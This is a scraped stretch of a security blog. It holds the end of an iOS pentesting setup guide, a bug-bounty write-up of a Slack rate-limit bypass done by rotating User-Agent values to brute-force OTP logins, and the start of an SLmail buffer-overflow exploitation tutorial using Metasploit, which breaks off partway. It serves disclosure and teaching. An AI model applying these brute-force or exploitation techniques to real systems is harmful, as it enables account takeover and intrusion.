<span style="font-family: "arial" , sans-serif;"><span style="background-color: white;">download can be found <a href="https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/networkpx/class-dump-z_0.2a.tar.gz" target="_blank">here</a> [ <a href="https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/networkpx/class-dump-z_0.2a.tar.gz">https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/networkpx/class-dump-z_0.2a.tar.gz</a> ]</span></span><br />
<span style="font-family: "arial" , sans-serif;"><span style="background-color: white;"><br /></span></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgtNMjQuwMeOJMfU7fHDxGLkNflEhGJoIxgbwUMSq878OrJzq9tnWdWf94nBgjT-lQCNZnJ7HSslfsmZW_nJVITzW_1fICEFFT5tVcMPxi_2U5shyphenhyphenSrI-UEk91gb8ZU0iJeB-voqKOV5Ig/s1600/Screen+Shot+2017-04-11+at+8.57.19+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="234" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgtNMjQuwMeOJMfU7fHDxGLkNflEhGJoIxgbwUMSq878OrJzq9tnWdWf94nBgjT-lQCNZnJ7HSslfsmZW_nJVITzW_1fICEFFT5tVcMPxi_2U5shyphenhyphenSrI-UEk91gb8ZU0iJeB-voqKOV5Ig/s640/Screen+Shot+2017-04-11+at+8.57.19+PM.png" width="640" /></a></div>
<span style="font-family: "arial" , sans-serif;"><span style="background-color: white;"><br /></span></span>
<span style="font-family: "arial" , sans-serif;"><span style="background-color: white;"><br /></span></span>
<span style="font-family: "arial" , sans-serif;">Now SSH into your device and download this file using wget.</span><br />
<span style="font-family: "arial" , sans-serif;"><b>wget https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/networkpx/class-dump-z_0.2a.tar.gz</b></span><br />
<span style="font-family: "arial" , sans-serif;"><br /></span>
<span style="font-family: "arial" , sans-serif;">If you encounter any certificate verification problem, then use --no-check-certificate after wget command</span><br />
<b style="font-family: arial, sans-serif;">wget https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/networkpx/class-dump-z_0.2a.tar.gz </b><span style="font-family: "arial" , sans-serif;"><b>--no-check-certificate</b></span><br />
<b>
<style type="text/css">
p.p1 {margin: 0.0px 0.0px 0.0px 0.0px; font: 11.0px Menlo; color: #000000; background-color: #ffffff}
span.s1 {font-variant-ligatures: no-common-ligatures}
</style>
</b><span style="font-family: "arial" , sans-serif;"><b><br /></b></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjTYw6Otf-HQhyphenhyphen5xG9CKHIs_Z4vw-XoHiAAzpSAaKKM7Pr-r-tofYBqenBJOZayHz4_xz8NUgh4XLlHRS2hbncvksc7zFMf-eXYWTINBP46d1KHni7pK5MJUEwi_kJuzisMUvI2x4jYTrg/s1600/Screen+Shot+2017-04-11+at+9.04.11+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="114" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjTYw6Otf-HQhyphenhyphen5xG9CKHIs_Z4vw-XoHiAAzpSAaKKM7Pr-r-tofYBqenBJOZayHz4_xz8NUgh4XLlHRS2hbncvksc7zFMf-eXYWTINBP46d1KHni7pK5MJUEwi_kJuzisMUvI2x4jYTrg/s640/Screen+Shot+2017-04-11+at+9.04.11+PM.png" width="640" /></a></div>
<span style="font-family: "arial" , sans-serif;"><b><br /></b></span>
<span style="font-family: "arial" , sans-serif;">Next extract the downloaded file using tar.</span><br />
<span style="font-family: "arial" , sans-serif;">Command : tar -xvzf class-dump-z_0.2a.tar.gz</span><br />
<span style="font-family: "arial" , sans-serif;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhStihvxRsR2PmqBY04Hf1BZGOZ9D7zymBBndaTiYMjeV1LBQbCQLqWjokpf26LvwQhceQvMPZtcv452qa5IN6SnmPgilYOWUKqlAlghUiVjIMAFqpD31-dxp0ubmpZNAJ64QByZaL8DyQ/s1600/Screen+Shot+2017-04-11+at+9.05.53+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="356" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhStihvxRsR2PmqBY04Hf1BZGOZ9D7zymBBndaTiYMjeV1LBQbCQLqWjokpf26LvwQhceQvMPZtcv452qa5IN6SnmPgilYOWUKqlAlghUiVjIMAFqpD31-dxp0ubmpZNAJ64QByZaL8DyQ/s640/Screen+Shot+2017-04-11+at+9.05.53+PM.png" width="640" /></a></div>
<span style="font-family: "arial" , sans-serif;"><br /></span>
<span style="font-family: "arial" , sans-serif;"><br /></span>
<span style="font-family: "arial" , sans-serif;">After extracting, Go to iphone_armv6 directory</span><br />
<span style="font-family: "arial" , sans-serif;">and copy the class-dump-z executable into /usr/bin/ directory</span><br />
<span style="font-family: "arial" , sans-serif;">Command: <b>cd iphone_armv6</b></span><br />
<span style="font-family: "arial" , sans-serif;">Command : <b>cp class-dump-z /usr/bin/</b></span><br />
<span style="font-family: "arial" , sans-serif;">Command : <b>class-dump</b> [enter] (You will see its working)</span><br />
<span style="font-family: "arial" , sans-serif;"><b><br /></b></span></div>
<div class="MsoNormal">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj6ixQsg8OXL4WYvDvmipksBLonNKWYn-1nnbQ1GO8NIxqeZw7Q-sa9knNhdog-Vqb8tCIZ01GlU03jdm1HgfHBz0gR7VUIXU7Py8o84jCgyxW33GM3c4hRZZjKyYnyH-Q1cp4mOLDvhxI/s1600/Screen+Shot+2017-04-11+at+9.08.48+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="214" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj6ixQsg8OXL4WYvDvmipksBLonNKWYn-1nnbQ1GO8NIxqeZw7Q-sa9knNhdog-Vqb8tCIZ01GlU03jdm1HgfHBz0gR7VUIXU7Py8o84jCgyxW33GM3c4hRZZjKyYnyH-Q1cp4mOLDvhxI/s640/Screen+Shot+2017-04-11+at+9.08.48+PM.png" width="640" /></a></div>
<span style="font-family: "arial" , sans-serif;"><span style="background-color: white;"><a href="https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/networkpx/class-dump-z_0.2a.tar.gz" target="_blank"><b><br /></b></a></span></span></div>
</div>
<div>
<b><br /></b>Note - If your devices in 32 bit then class-dump will work without any issues. But if you device is 64 Bit then you will see an error while using class-dump.<br />
In this case you have to install "pcre" from cydia app. After installing pcre you will be able to use class-dump on your 64 bit devices.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEirl8HgHLu91v-GQ8UsO15A5As_4bruqAk79ejPAfWq_HDV8JCaKj9FvGjIMlZXTgQ65tTQy6PGcfSapPUzPSOXiN76fjdAlz3CtyfVltJ9jDixiv1-kuXfHHe-bnjflwVAhYQ1VKBS7UM/s1600/Screen+Shot+2017-04-12+at+8.56.07+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="440" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEirl8HgHLu91v-GQ8UsO15A5As_4bruqAk79ejPAfWq_HDV8JCaKj9FvGjIMlZXTgQ65tTQy6PGcfSapPUzPSOXiN76fjdAlz3CtyfVltJ9jDixiv1-kuXfHHe-bnjflwVAhYQ1VKBS7UM/s640/Screen+Shot+2017-04-12+at+8.56.07+PM.png" width="640" /></a></div>
<br />
<b><br /></b>
<b>Lesson learned:</b><br />
<b><br /></b>
We saw that, how we can JailBreak our device and After it. How we can install various apps which will help us in iOS Application Pentesting.<br />
<br />
Please share & do comment if you have any question.</div>
<div>
<b><br /></b>
<br />
<div style="text-align: right;">
<b><a href="http://www.websecgeeks.com/2017/04/ios-application-pentesting-part-2-ios.html" target="_blank">Next Post ></a></b></div>
<div style="text-align: right;">
iOS Application Pentesting Part 2 : iOS Application Basics</div>
</div>
<div>
<b><a href="http://www.websecgeeks.com/2017/04/ios-application-pentesting-part-2-ios.html" target="_blank"><br /></a></b></div>
<div>
<b><br /></b></div>
</div>
Narendra Bhatihttp://www.blogger.com/profile/15834240919754131768noreply@blogger.com0tag:blogger.com,1999:blog-3462277729309057123.post-79744190769536549972017-04-11T16:38:00.000+05:302017-04-11T16:38:33.654+05:30Slack Rate Limit Bypass<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhEKZThvyr6tNmOgG3ugAUdks_KhEUOHAUpErv6nCS_PfBv4lsNpu-HbJBKcXzT4-ln7xZDp4TvWye-HsrJ72CiQJZjMs3ymSHeUM9Df2rySo5eMVduJnkvDmeRG1FTIWzPzD5pxwX_UfM/s1600/slack.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="200" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhEKZThvyr6tNmOgG3ugAUdks_KhEUOHAUpErv6nCS_PfBv4lsNpu-HbJBKcXzT4-ln7xZDp4TvWye-HsrJ72CiQJZjMs3ymSHeUM9Df2rySo5eMVduJnkvDmeRG1FTIWzPzD5pxwX_UfM/s200/slack.png" width="200" /></a></div>
<h2 style="clear: both; text-align: center;">
<b>Slack Rate Limit Bypass</b></h2>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
First of all, Thanks to all readers for the appreciation got in my inbox.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Today we will see, How i was able to Bypass The Rate Limit Implemented In Slack for preventing automated/brute force attempts.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Rate limit is now days a very common things, They can be found every where.Usually rate limit are deployed to prevent automated and brute force attempts, Such as brute forcing OTP (One Time Password) & User Account Passwords. </div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
From recent months, I was working on Slack Bug Bounty Program and y god grace got more then 15 valid vulnerabilities till today(Some of the still in fixing stage). One of the interesting vulnerability was Slack Rate Limit Bypass. </div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
First of all, I was reported <b>No Rate Limit Implemented Vulnerability On Slack(Which was not true)</b> :p In slack Mobile Applications End-Point "<span style="background-color: white; font-family: , "blinkmacsystemfont" , "segoe ui" , "roboto" , "oxygen" , "ubuntu" , "cantarell" , "open sans" , "helvetica neue" , sans-serif; font-size: 13px;"><b>/api/auth.signin</b>"</span> , I was looking for positive response from slack guys, Next day slack replied that my report is not proper as they have rate limit implemented. Now what was wrong?</div>
<div class="separator" style="clear: both; text-align: left;">
</div>
<a name='more'></a><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjFeOLFFxvzWjbTQ6mRfWSVXf-pPvKgvRDbppVqt6EEU2jxYoqpj449StgUomVFsyE0mgnS-pHWd3vxM76_PwcdGPpAY3ct61-ymH9DLF8yB74QatBPWHCrJY5aJbM06xY9op2JXHP7fF0/s1600/Screen+Shot+2016-11-20+at+11.11.46+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="64" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjFeOLFFxvzWjbTQ6mRfWSVXf-pPvKgvRDbppVqt6EEU2jxYoqpj449StgUomVFsyE0mgnS-pHWd3vxM76_PwcdGPpAY3ct61-ymH9DLF8yB74QatBPWHCrJY5aJbM06xY9op2JXHP7fF0/s640/Screen+Shot+2016-11-20+at+11.11.46+PM.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
This Was My First POC(Invalid)</div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div style="text-align: center;">
<iframe allowfullscreen="" class="YOUTUBE-iframe-video" data-thumbnail-src="https://i.ytimg.com/vi/d1dknJXCPy4/0.jpg" frameborder="0" height="266" src="https://www.youtube.com/embed/d1dknJXCPy4?feature=player_embedded" width="320"></iframe></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgGMBCIzuYuQF1WeTRd40kU_Cuq78gUIB8TR2Wv2pEtPiCMWzBBHDXwUXh_68rmHy9y8GxcRZTW7u3eL-fHjzvh3tkbn0eaW92FggA6gYhxGjaxRvSjrz9Z6yUhD_-l7bkiQYixclVXqB4/s1600/Screen+Shot+2016-11-20+at+11.14.19+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="228" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgGMBCIzuYuQF1WeTRd40kU_Cuq78gUIB8TR2Wv2pEtPiCMWzBBHDXwUXh_68rmHy9y8GxcRZTW7u3eL-fHjzvh3tkbn0eaW92FggA6gYhxGjaxRvSjrz9Z6yUhD_-l7bkiQYixclVXqB4/s640/Screen+Shot+2016-11-20+at+11.14.19+PM.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
Actually in my POC i was using Burp Free Edition which have request throttling in Intruder Attack. </div>
<div class="separator" style="clear: both; text-align: left;">
That means i have tried only <b>100 attempt with time throttle of 5 seconds</b> for each request, which not looks good.<b>As a result Slack Rate Limit is not getting triaged in only 100 attempt with time throttle, Also for a real attack scenario attacker need to send 1000 of request in every minute.</b> </div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
To confirm this behavior, I tried 1000 attempts with 30 threads without Time Throttling .At the end of the attack i was silently rate limited as Said by Slack Team Member :( </div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
For a quick POC, I forgot to tried this same attack without time throttling.After many discussion, Finally slack closed my report as Informative and i was totally agree with this decision.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhT1X1Xk6cH2KwaFDCJxzBBu0jKOXkOXuo4X2FnLf3yykRKvD8MTidtssL6dzSfEAuugKAt-ltIXMZM3QvJbWEmDnAyyv3xGkeyXC2iuIDfqExpoCFS_odpr_AcO-wZP8Egt4A5bhBnjkY/s1600/closed.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="178" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhT1X1Xk6cH2KwaFDCJxzBBu0jKOXkOXuo4X2FnLf3yykRKvD8MTidtssL6dzSfEAuugKAt-ltIXMZM3QvJbWEmDnAyyv3xGkeyXC2iuIDfqExpoCFS_odpr_AcO-wZP8Egt4A5bhBnjkY/s640/closed.PNG" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
I was like</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://drkaylenehenderson.com/wp-content/uploads/2015/04/sad-kid.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://drkaylenehenderson.com/wp-content/uploads/2015/04/sad-kid.jpg" height="179" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
******</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
After 2 days, I decide to give an another try on same vulnerability.I tried different techniques, Finally one of the technique worked which i also mention in my Post <a href="http://www.websecgeeks.com/2015/06/bypass-brute-force-protection-login.html" target="_blank">http://www.websecgeeks.com/2015/06/bypass-brute-force-protection-login.html</a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
I tried every request with a different User Agent Values.With 100 Threads :p And 1340 Attempts In Less then 40 seconds.(Very Fast Actually =D )</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjYS1Nrp-VwjG2fU099ArVuaR58PLiZWiuf9Hib0N3O9RgV5hccfXVeeaKHm1XjiGx3fVB8t2h2xnUv8qCCLc819k_a70Bydq4i9pBiNgJNPKlw5U7aMXQ05aH5ybVvsi3jRG6dlbfSDPk/s1600/Screen_Shot_2016-09-10_at_9.08.18_PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="112" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjYS1Nrp-VwjG2fU099ArVuaR58PLiZWiuf9Hib0N3O9RgV5hccfXVeeaKHm1XjiGx3fVB8t2h2xnUv8qCCLc819k_a70Bydq4i9pBiNgJNPKlw5U7aMXQ05aH5ybVvsi3jRG6dlbfSDPk/s640/Screen_Shot_2016-09-10_at_9.08.18_PM.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3sck6hyphenhyphen8MprDPeWQqnaB6a4vbI2Ffil0onY3cPiyqo-ccFEovcPrLTg3eqaG_HPHeSXvQ-TeDRiXPnhpZ9Qcemsq81MkTP2XbIuZZG441_G7tscSwYaHv6Y0egqbQfu23BLCS6lIv3TY/s1600/Screen_Shot_2016-09-10_at_9.08.27_PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3sck6hyphenhyphen8MprDPeWQqnaB6a4vbI2Ffil0onY3cPiyqo-ccFEovcPrLTg3eqaG_HPHeSXvQ-TeDRiXPnhpZ9Qcemsq81MkTP2XbIuZZG441_G7tscSwYaHv6Y0egqbQfu23BLCS6lIv3TY/s320/Screen_Shot_2016-09-10_at_9.08.27_PM.png" width="307" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Which tricking the Slack Rate Limit Logic to treat/count every attempt as a new request. As a result Attacker can perform multiple tons of attempts on different end-points. Such as OTP(One Time Password "<span style="background-color: white; font-size: 13px;"><b>/api/auth.signin</b>"</span>) & Password.(Slack is not using Strong Password Enforcement Policy, Hence user can set password as "<b>abc123"</b> which can be crack easily.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Below,We can see that One of the attempt number 1340 responded without "<b>invalid pin"</b>, Which indicate a different response(Response with 0Auth Tokens,xxid etc.) as compare to other attempts.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhcfzLGQM-SEakW2fU2BbOJjeDl4GpdGb4-YonvMk2P8Q-pNgFOQA1DJvmm4Td6Ly-HH-YBq1NJM8qFF1z4LodEeSE3DosgzUt4MCbOpq4c1ortE5HFPcBl_p2YhPW6wcqJEiVogEo88zs/s1600/Screen_Shot_2016-09-10_at_9.10.02_PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhcfzLGQM-SEakW2fU2BbOJjeDl4GpdGb4-YonvMk2P8Q-pNgFOQA1DJvmm4Td6Ly-HH-YBq1NJM8qFF1z4LodEeSE3DosgzUt4MCbOpq4c1ortE5HFPcBl_p2YhPW6wcqJEiVogEo88zs/s640/Screen_Shot_2016-09-10_at_9.10.02_PM.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
Second POC Video With 1340 Attempt, Without Time Throttling </div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div style="text-align: center;">
<iframe allowfullscreen="" class="YOUTUBE-iframe-video" data-thumbnail-src="https://i.ytimg.com/vi/tt6q6Fu35G8/0.jpg" frameborder="0" height="266" src="https://www.youtube.com/embed/tt6q6Fu35G8?feature=player_embedded" width="320"></iframe><br />
Finally i started dancing :p<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEikXNeaT4Jc5w0UYPqzRLRdcX5Q9A9vVLKbQnYmYGDOsKrnDyX8-xjyANugejLEcyLf_I_cGIIUh0nkRxiPaPb061MJBJ7y15b-EnFE7GXmRq_4aCI8JRjHE5fFedyhPQoGyI8lRtrVSjQ/s1600/dancing.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEikXNeaT4Jc5w0UYPqzRLRdcX5Q9A9vVLKbQnYmYGDOsKrnDyX8-xjyANugejLEcyLf_I_cGIIUh0nkRxiPaPb061MJBJ7y15b-EnFE7GXmRq_4aCI8JRjHE5fFedyhPQoGyI8lRtrVSjQ/s1600/dancing.gif" /></a></div>
<br /></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: left;">
This vulnerability was allowing me to Brute Force the User Authentication & OTP end points.</div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
After fixing, Slack deployed a strict rate limit logic.</div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Slack rewarded $500 for this vulnerability.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Full report can be found here - <a href="https://hackerone.com/reports/165727" target="_blank">https://hackerone.com/reports/165727</a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Comments are always welcome.</div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<br /></div>
Narendra Bhatihttp://www.blogger.com/profile/15834240919754131768noreply@blogger.com5tag:blogger.com,1999:blog-3462277729309057123.post-28590027809476045562017-04-11T16:31:00.000+05:302017-04-11T16:36:52.491+05:30Exploiting Software Based Vulnerabilities : Attacking Network - Pentesting Network <div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiTWHzO0sWg5VmD9hWMb8O5DEuniVlbp5rGG_kW_GvC2NR5GDCSp_gT0hMYQcqOTDdxKsmEw0ZL6MTWVdclAUeFcTjK-KSId3FqqtwKWALB0_9QOHrjJsMpWLXepOp9szhCemYskfk65O0/s1600/security_exploits-642x428-300x300.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiTWHzO0sWg5VmD9hWMb8O5DEuniVlbp5rGG_kW_GvC2NR5GDCSp_gT0hMYQcqOTDdxKsmEw0ZL6MTWVdclAUeFcTjK-KSId3FqqtwKWALB0_9QOHrjJsMpWLXepOp9szhCemYskfk65O0/s1600/security_exploits-642x428-300x300.png" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<h2 style="clear: both; text-align: center;">
<b>Exploiting Software Based Vulnerabilities : Attacking Network - Pentesting Network </b><b><br /></b></h2>
<div>
<b><br /></b></div>
<div>
Vulnerabilities exist on a particular machine can be software and hardware based. Today we will see how we can Exploit Software Based Vulnerabilities to take over target machine.</div>
<div>
<br /></div>
<div>
<br /></div>
<div>
Software based vulnerabilities are nothing, but just a coding/programming error exist in a Particular software version or series. Which can be hacked/compromise using a group of malicious code called as an "Exploit".</div>
<div>
<br /></div>
<div>
<br /></div>
<div>
First we have identified a SMTP service on our target machine 192.168.131.137</div>
<div>
<br /></div>
<div>
SLmail smtpd 5.5.0 4433 is running in port 25 </div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiGq7f79WqiKQvGkbmzeq0m_RHA-b6n3lM2mUMJGBFKiWAgFlMpoXtAizyLRkgCrf2ZOviFVtdSDKmFzmzTPP3DFFFilFaa3iGG1ZE83DvQrPV9MAZo6wF8I8HEqmyLjClFPspJyqCy1yc/s1600/Screen+Shot+2017-04-10+at+10.51.28+AM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="360" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiGq7f79WqiKQvGkbmzeq0m_RHA-b6n3lM2mUMJGBFKiWAgFlMpoXtAizyLRkgCrf2ZOviFVtdSDKmFzmzTPP3DFFFilFaa3iGG1ZE83DvQrPV9MAZo6wF8I8HEqmyLjClFPspJyqCy1yc/s640/Screen+Shot+2017-04-10+at+10.51.28+AM.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
</div>
<a name='more'></a><br />
<div class="separator" style="clear: both; text-align: left;">
By a quick google search we have found that this particular software is vulnerable to "Buffer Overflow" which allow a remote user to perform Code Execution.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<a href="https://www.exploit-db.com/exploits/638/">https://www.exploit-db.com/exploits/638/</a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEimnPfVgmok9knKODfDLzrIGXy6yH6rudJhm5Ap7x2TBnp4PNcMQWpzi7R448Ug7g4Ehv-86rAlNnc6BpDLumVjrJcPndbFo1UZVtL4h5__-t7zjNPUhq3j7SeCAW2JrE2tEeoYryATOy0/s1600/Screen+Shot+2017-04-10+at+10.55.41+AM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="254" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEimnPfVgmok9knKODfDLzrIGXy6yH6rudJhm5Ap7x2TBnp4PNcMQWpzi7R448Ug7g4Ehv-86rAlNnc6BpDLumVjrJcPndbFo1UZVtL4h5__-t7zjNPUhq3j7SeCAW2JrE2tEeoYryATOy0/s640/Screen+Shot+2017-04-10+at+10.55.41+AM.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Now its time to exploit this vulnerability on target machine, On the exploit page i have mention we can download that exploit to run against that machine.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
We can quickly search for exploit in metasploit for a quick exploitation. </div>
<div class="separator" style="clear: both; text-align: left;">
And yes, we have found a perfect match.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjjLHHegpKZnVmH2dGYLHuWZnwU2J-Pke6ptuqUBLolOgDXfSkm-HsbmRNQ6LLhHtFZ0WdsZLjcp2fCKjUvegANSXcMEqEY0_sYJMpPGbW8cuE6V3fUwbl7cmh891QD69Tb1F-nXHPI624/s1600/Screen+Shot+2017-04-10+at+11.10.17+AM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="134" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjjLHHegpKZnVmH2dGYLHuWZnwU2J-Pke6ptuqUBLolOgDXfSkm-HsbmRNQ6LLhHtFZ0WdsZLjcp2fCKjUvegANSXcMEqEY0_sYJMpPGbW8cuE6V3fUwbl7cmh891QD69Tb1F-nXHPI624/s640/Screen+Shot+2017-04-10+at+11.10.17+AM.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
